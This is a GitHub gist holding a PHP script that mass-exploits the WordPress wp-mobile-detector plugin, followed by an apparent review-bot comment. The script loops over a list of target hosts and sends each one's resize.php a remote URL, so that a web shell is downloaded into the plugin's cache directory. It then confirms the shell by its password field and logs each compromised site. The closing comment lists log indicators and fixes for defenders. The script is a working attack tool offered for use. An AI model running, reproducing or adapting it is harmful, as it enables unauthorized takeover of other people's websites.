
Revisions

  1. winstrool created this gist Jun 7, 2016.
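--- a/gistfile1.txt
+++ b/gistfile1.txt
@@ -0,0 +1,57 @@
+<?php
+set_time_limit(0);
+error_reporting(0);
+
+$get_url=file('url.txt');
+$shell_url="http://localhost/shell.php";
+
+function curl($url='', $post='', $referer='', $proxy='')
+{
+$cl = curl_init();
+curl_setopt($cl, CURLOPT_URL, $url);
+curl_setopt($cl, CURLOPT_RETURNTRANSFER,1);
+curl_setopt($cl, CURLOPT_HEADER, 0);
+curl_setopt($cl, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($cl, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($cl, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/10.10');
+#curl_setopt($cl, CURLOPT_ENCODING, 'gzip, deflate');
+curl_setopt($cl, CURLOPT_COOKIEJAR, $_SERVER['DOCUMENT_ROOT'].'/cookie.txt');
+curl_setopt($cl, CURLOPT_COOKIEFILE, $_SERVER['DOCUMENT_ROOT'].'/cookie.txt');
+if(!empty($post)) {
+curl_setopt($cl, CURLOPT_POST, 1);
+
+curl_setopt($cl, CURLOPT_POSTFIELDS, $post);}
+else{
+curl_setopt($cl, CURLOPT_POST, 0);}
+
+if(!empty($referer)){
+curl_setopt($cl, CURLOPT_REFERER, $referer);}
+else{
+curl_setopt($cl,CURLOPT_REFERER, 1);}
+
+if(!empty($proxy)) {
+curl_setopt($cl, CURLOPT_PROXY, $proxy);}
+
+$ex=curl_exec($cl);
+#$ex=iconv('cp1251','UTF8',$ex);
+curl_close($cl);
+return $ex;
+}
+
+for($i=0;$i<count($get_url);$i++){
+curl('http://'.trim($get_url[$i]).'/wp-content/plugins/wp-mobile-detector/resize.php','src='.$shell_url);
+
+$matches=file_get_contents('http://'.trim($get_url[$i]).'/wp-content/plugins/wp-mobile-detector/cache/shell.php');
+
+if (preg_match('#input type=password name=pass#', $matches, $o))
+{
+echo $i.':: http://'.trim($get_url[$i])."/wp-content/plugins/wp-mobile-detector/cache/shell.php;pass\n";
+file_put_contents('./shell.txt','http://'.trim($get_url[$i])."/wp-content/plugins/wp-mobile-detector/cache/shell.php;pass\n", FILE_APPEND);
+}
+
+ob_flush();
+flush();
+}
+
+
+?>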
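Review bot: The file has no header comment, so its behaviour has to be read out of the loop at the bottom: for each host listed in `url.txt` it POSTs `src=<remote URL>` to `/wp-content/plugins/wp-mobile-detector/resize.php` and then requests `/wp-content/plugins/wp-mobile-detector/cache/shell.php` to check whether a file appeared there. I would add a top-of-file comment recording that pair of requests, e.g. `// POST <host>/wp-content/plugins/wp-mobile-detector/resize.php (src=<URL>), then GET .../cache/shell.php`. Those two paths, the hard-coded Opera 9.80 User-Agent on the POST, and the `input type=password name=pass` marker the script matches on are the strings a defender searches access logs and the plugin's `cache/` directory for. On the server side the finding to act on is any `.php` file under that `cache/` directory. Removing or updating the plugin and denying script execution in `cache/` should close the path this script depends on, though that is inferred from the requests alone because the plugin code is not shown here.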